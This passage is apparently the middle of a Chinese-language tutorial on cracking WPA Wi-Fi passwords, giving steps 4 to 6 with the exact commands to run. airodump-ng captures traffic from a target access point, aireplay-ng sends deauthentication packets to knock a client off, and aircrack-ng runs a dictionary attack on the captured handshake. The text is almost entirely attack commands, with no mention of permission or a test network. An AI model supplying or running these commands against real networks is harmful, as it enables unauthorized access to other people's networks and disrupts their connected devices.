4>监控开启后就选择好了我们的目标AP执行下面命令
airodump-ng -w loiter -c 4 --bssid AP's MAC mon0
//* AP's MAC 为之前查看到的AP的MAC地址,这时我们只需要看到几个地方
BSSID下的地址是AP MAC . STATION下的地址是CP MAC
然后根据得到的Client的MAC地址,从中选择一个活跃的*//
5>打开一个新的终端,而之前的终端不要关闭,在新的终端输入
aireplay-ng -0 10 -a AP's MAC -c CP's MAC mon0
//AP's MAC是BSSID下的地址,CP's MAC是 STATION下的地址是CP
执行命令后在回到第一个终端看是否出现 WAP Handshake标志,如果出现就已经抓到握手了.如果没有那么继续执行命令直到出现
6>执行 aircrack-ng -w password.txt -b AP's MAC loiter.cap
//password.txt为字典文件,自己配置的文件也需要放到默认的路径下